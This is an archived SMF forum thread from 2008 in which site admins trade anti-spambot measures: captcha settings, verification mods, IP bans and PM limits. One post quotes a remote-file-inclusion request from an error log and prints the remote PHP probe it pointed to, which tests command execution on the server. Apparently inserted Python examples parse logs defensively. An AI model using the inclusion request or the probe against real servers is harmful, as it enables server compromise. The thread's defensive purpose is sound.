Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum

Started by Deprecated, November 11, 2008, 06:26:59 PM

MadMax201

Hi there,

I don't know if it was already mentioned:
My workaround to stop those spam-bots is to append a suffix like "_dummy" to the user / email field on the Register.template.php form.
You also have to modify the document.forms.creator.regSubmit.disabled line and the Register.php around line 292.

With this my smf 1.1.7 is spam-free for now.


regards Mike

ModelBoatMayhem

Quote from: Deprecated on November 11, 2008, 06:26:59 PM
If you have been considering upgrading to 2.0, now might be a good time to do so.

1. Thanks for all your help and advice Deprecated, much appreciated.
Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?

2. Also do any of the security mods work on all themes?

Martin - England (SMF 1.1.7 - attacks a day currently.)


That's my firm opinion.... but what do I know?!

Paul Cull

Just an observation: I have been banning the IPs of the bots, and notice that, although I haven't had any new signups since I upped the captcha level and added age verification, I am still getting visited from a few of these IP addresses.

All of these got my "you have been banned" message this morning, which makes me think that there is a limited number of IP ranges from which these attacks are originating, and that for some strange reason, the bot regularly comes back to my forum to try its luck again.

Weird stuff eh

Paul

bigmo66

It's been about 24 hours and at least 100 tries have been made to register bogus accounts to my forum and not one has got past the increased Captcha & age verification.  Will they "learn" or is this possibly good enough?

Deprecated

mprayii- Just try them and see. Install one, test it yourself. If you like it, keep it. If not, uninstall it and install a different one.

That's the first report that the "Are You Human?" mod failed. First I've seen anyway.

Deprecated

Quote from: ModelBoatMayhem on November 13, 2008, 08:11:38 AM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
If you have been considering upgrading to 2.0, now might be a good time to do so.

1. Thanks for all your help and advice Deprecated, much appreciated.
Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?

2. Also do any of the security mods work on all themes?

Martin - England (SMF 1.1.7 - attacks a day currently.)

Whether to install 2.0 is a difficult decision for most. Fewer themes are available, and in some cases your mods may not be available in 2.0 versions. TinyPortal isn't compatible yet, although Simple Portal is a good alternative and is 2.0 compatible.

I have all my own sites on 2.0 Beta 4, but I don't think it's time for everybody to switch up, even though I wish they would just because it would be easier if we didn't have to support 1.x. There are several 2.0 features well worth the upgrade, not the least of which is improved security and anti-bot protection. The PM system is much, much, much improved! (I really like it.) Mod writers like 2.0 because in some cases it's easier and cleaner to write mods for 2.0. Finally, there are some appearance issues and at least one bug that needs fixing, although the solution is easy and well known (totalMembers bug).

It's up to each person to decide if or when to upgrade to 2.0. There is no guarantee that the spambot attacks won't spread to 2.0, although we are well prepared, including the three mods in the OP.

Deprecated

Quote from: bigmo66 on November 13, 2008, 09:18:33 AM
It's been about 24 hours and at least 100 tries have been made to register bogus accounts to my forum and not one has got past the increased Captcha & age verification.  Will they "learn" or is this possibly good enough?

Bots don't learn, but their botmasters might decide to reprogram them.

ethankcvds

Well, I'm not taking any chances: I'm adding questions and the reCAPTCHA mod to my SMF 2.0 beta 4. I'm also running SMF 1.1.7, but it's an invite-only site, so I would like to see them register to that site.
No PMs for support please!

zigzag

Quote: That's the first report that the "Are You Human?" mod failed. First I've seen anyway.

I've only had one pass through the Are You Human mod, but the IP was from Lagos and I think that the registration might have been processed by a human rather than a bot.

All the other IPs that made it through before I installed the mod were from Saudi, Ukraine and Germany, and the same bots are still trying to sign up, but so far none have got past.

As well as the mod I have the SMF captcha set to medium.

Muldoon

Well stepping up the visual verification image from medium to high has stopped the bots in their tracks for my site...not one registration from them after implementing this step!  8)  Thank you for the guidance.

Pere Escobar Solsona

For opened forums (where guests can post messages) I tried the Advanced Visual Verification MOD and, when installed, it works fine (no more spam messages); the installation fails on my 1.1.7 forum, but the solution isn't so difficult...

Burke ♞ Knight

I just had a strange error pop up, which may or may not be related:

Guest
Today at 10:48:15 AM
IP address 195.12.53.176
Type of error: User
Error 404 - Not Found (http://www.bksmf.com//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.geocities.com/dianavirsana/test.txt???)

I was able to check out that test.txt file, and I cannot figure out what this person is up to.

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
// Probe: runs "id" (Unix) or "net start" (Windows) and reports whether command execution worked.
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
}
else{
    // Second attempt after restoring the safe_mode / open_basedir settings.
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    }else{
        echo("Safe Mode of this Server is : ");
        echo("SafemodeON");
    }
}
// Tries each available command-execution function in turn and returns the output.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;
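
One way to spot this kind of request in a forum error log, as an added example that is not part of the original post: it flags any query parameter whose value is a URL on a different host, which is the pattern in the 404 entry above. The second log entry and the `forum.example` host are constructed sample data, and the entry layout is assumed to match the one quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REMOTE_SCHEMES = {"http", "https", "ftp"}  # schemes checked for in parameter values
ENTRY_IP = re.compile(r"^IP address\s+(\S+)")
ENTRY_URL = re.compile(r"^Error \d+ - .*?\((\S+)\)\s*$")

def remote_include_params(url):
    """Return (name, value) pairs whose value is a URL on a host other than the site's."""
    parts = urlsplit(url)
    own_host = parts.hostname or ""
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        try:
            target = urlsplit(value.strip())
        except ValueError:
            continue  # malformed value, not a usable URL
        if target.scheme not in REMOTE_SCHEMES or not target.hostname:
            continue
        if target.hostname == own_host:
            continue  # e.g. a return URL pointing back at the forum itself
        hits.append((name, value))
    return hits

def scan_error_log(lines):
    """Pair each flagged request with the 'IP address' line of the same log entry."""
    findings, current_ip = [], None
    for line in lines:
        line = line.strip()
        if m := ENTRY_IP.match(line):
            current_ip = m.group(1)
        elif m := ENTRY_URL.match(line):
            for name, value in remote_include_params(m.group(1)):
                findings.append({"ip": current_ip, "param": name,
                                 "remote_host": urlsplit(value).hostname})
    return findings

# First entry is the one quoted in the post; the second is constructed sample data.
SAMPLE_LOG = """\
Guest
IP address 195.12.53.176
Type of error: User
Error 404 - Not Found (http://www.bksmf.com//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.geocities.com/dianavirsana/test.txt???)
Guest
IP address 192.0.2.10
Type of error: User
Error 404 - Not Found (http://forum.example/index.php?action=login&return=http://forum.example/index.php)
""".splitlines()

if __name__ == "__main__":
    for finding in scan_error_log(SAMPLE_LOG):
        print(finding)
```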

Deprecated

Get a good anti-virus anti-trojan program too. You'll need it.

Burke ♞ Knight

Quote from: Deprecated on November 13, 2008, 01:26:59 PM
Get a good anti-virus anti-trojan program too. You'll need it.

I have one, but the snoop only seems to be scanning sites, looking for installation setup.
However, the Apache Error mod sent him to a 404 not found error... :)

wagtail

They are spamming my cms and smf forum in equal measure.
So this definitely isn't smf specific.

stopforumspam_dot_com is also listing a lot of spammers over the last few days.

At the moment I am resorting to banning the IP ranges from my sites.
My error pages are full with failed attempts (as well as a few still getting through).

Most IPs appear to be from Eastern European servers.
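
A sketch of how to check the "limited number of IP ranges" observation made earlier in the thread before banning whole ranges, as an added example that is not from any poster: it groups ban-log hits by /24 network and reports networks seen from several distinct addresses. The `HH:MM:SS IP a.b.c.d` line format and the documentation-range addresses are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

def summarize_ranges(log_lines, prefix=24, min_distinct=2):
    """Return [(network, distinct_addresses, hits)] for networks with enough distinct sources."""
    hits = defaultdict(int)
    addrs = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) != 3 or fields[1] != "IP":
            continue  # not a ban-log line
        try:
            ip = ipaddress.ip_address(fields[2])
        except ValueError:
            continue  # unparsable address
        if ip.version != 4:
            continue  # the /24 grouping below only makes sense for IPv4
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        hits[net] += 1
        addrs[net].add(ip)
    rows = [(str(net), len(addrs[net]), hits[net])
            for net in hits if len(addrs[net]) >= min_distinct]
    # Busiest networks first; ties broken by network name for stable output.
    return sorted(rows, key=lambda r: (-r[2], r[0]))

# Constructed sample data (RFC 5737 documentation addresses).
SAMPLE_BANLOG = """\
08:11:01 IP 198.51.100.2
08:10:59 IP 198.51.100.2
08:10:52 IP 192.0.2.109
08:10:51 IP 192.0.2.109
06:50:22 IP 192.0.2.67
06:31:09 IP 192.0.2.91
05:27:37 IP 203.0.113.27
not a log line
""".splitlines()

if __name__ == "__main__":
    for network, distinct, count in summarize_ranges(SAMPLE_BANLOG):
        print(f"{network}: {distinct} addresses, {count} hits")
```

A single address hitting repeatedly (the `198.51.100.2` case) stays below `min_distinct`, so it is left to a per-IP ban rather than a range ban.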

lax.slash

Has anyone had users report SPAM through PM systems?

And isn't there some website that you can hook up your forum to, and they somehow check to see if the user is a bot? Can't remember the site.

forumite

Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs and haven't seen it happen since. A number of forums were hit by the same user name.

Muldoon

Quote from: rvforumite on November 13, 2008, 03:41:45 PM
Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs and haven't seen it happen since. A number of forums were hit by the same user name.

I wonder if it was the same spammer that hit me as well, that was a little over two years ago for me, haha.  Up'd my PM capabilities ...required 50 posts first before a member can PM.

forumite

His user name in a number of forums was Robert Thompson (or Thomson). I'm still gun shy from the after effects of that one, and still only manually turn on PMs for folks I've observed to be good forum citizens, or folks I know personally. Also added other PM constraints like minimum number of posts, maximum number of PMs from the same IP in a given time, use of CAPTCHA, etc. Call me paranoid, but I still have the wounds from the complaints and having to explain the whole thing individually to several thousand unhappy campers.

I was online at the time, saw him register, come into the forum, then send PMs. Thought it was strange, then received a PM from another member with a heads up and a copy of his message. But the damage was done before I could react.

Bill.Ramby

Quote from: Muldoon on November 13, 2008, 06:19:55 PM
Quote from: rvforumite on November 13, 2008, 03:41:45 PM
Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs and haven't seen it happen since. A number of forums were hit by the same user name.

I wonder if it was the same spammer that hit me as well, that was a little over two years ago for me, haha.  Up'd my PM capabilities ...required 50 posts first before a member can PM.

Same here. Hhmmm.

I went into the database and deleted all those PMs, then I had to do a recount on my forum.
